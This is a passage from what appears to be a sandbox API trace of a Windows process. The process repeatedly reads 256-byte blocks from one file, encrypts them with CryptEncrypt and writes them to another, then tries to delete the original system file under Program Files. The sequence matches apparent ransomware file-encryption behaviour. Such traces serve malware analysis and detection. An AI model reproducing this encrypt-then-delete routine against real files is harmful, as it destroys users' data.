dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.659] GetLastError () returned 0x0 [0153.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.659] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.659] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.659] GetLastError () returned 0x0 [0153.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.659] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.659] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.659] GetLastError () returned 0x0 [0153.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.659] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.659] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.659] GetLastError () returned 0x0 [0153.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.659] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.659] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.659] GetLastError () returned 0x0 [0153.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.659] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.659] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.659] GetLastError () returned 0x0 [0153.659] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.660] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.660] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.660] GetLastError () returned 0x0 [0153.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.660] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.660] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.660] GetLastError () returned 0x0 [0153.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.660] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.660] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.660] GetLastError () returned 0x0 [0153.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.660] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.660] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.660] GetLastError () returned 0x0 [0153.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.660] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.660] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.660] GetLastError () returned 0x0 [0153.660] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.661] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.661] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.661] GetLastError () returned 0x0 [0153.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.661] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.661] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.661] GetLastError () returned 0x0 [0153.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.661] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.661] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.661] GetLastError () returned 0x0 [0153.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.661] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.661] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.661] GetLastError () returned 0x0 [0153.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.661] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.662] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.662] GetLastError () returned 0x0 [0153.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.662] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.662] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.662] GetLastError () returned 0x0 [0153.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.662] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.662] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.662] GetLastError () returned 0x0 [0153.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.662] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.662] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.662] GetLastError () returned 0x0 [0153.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.662] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.662] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.662] GetLastError () returned 0x0 [0153.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.662] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.663] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.663] GetLastError () returned 0x0 [0153.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.663] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.663] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.663] GetLastError () returned 0x0 [0153.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.663] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.663] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.663] GetLastError () returned 0x0 [0153.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.663] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.663] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.663] GetLastError () returned 0x0 [0153.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.663] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.663] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.663] GetLastError () returned 0x0 [0153.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.663] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.664] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.664] GetLastError () returned 0x0 [0153.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.664] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.664] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.664] GetLastError () returned 0x0 [0153.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.664] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.664] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.664] GetLastError () returned 0x0 [0153.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.664] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.664] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.664] GetLastError () returned 0x0 [0153.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.664] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.664] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.664] GetLastError () returned 0x0 [0153.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.664] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.664] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0153.664] GetLastError () returned 0x0 [0153.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0153.665] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0153.665] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0153.665] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui")) returned 0x20 [0153.665] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0153.665] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui") returned 1 [0153.665] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui")) returned 0 [0153.665] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common 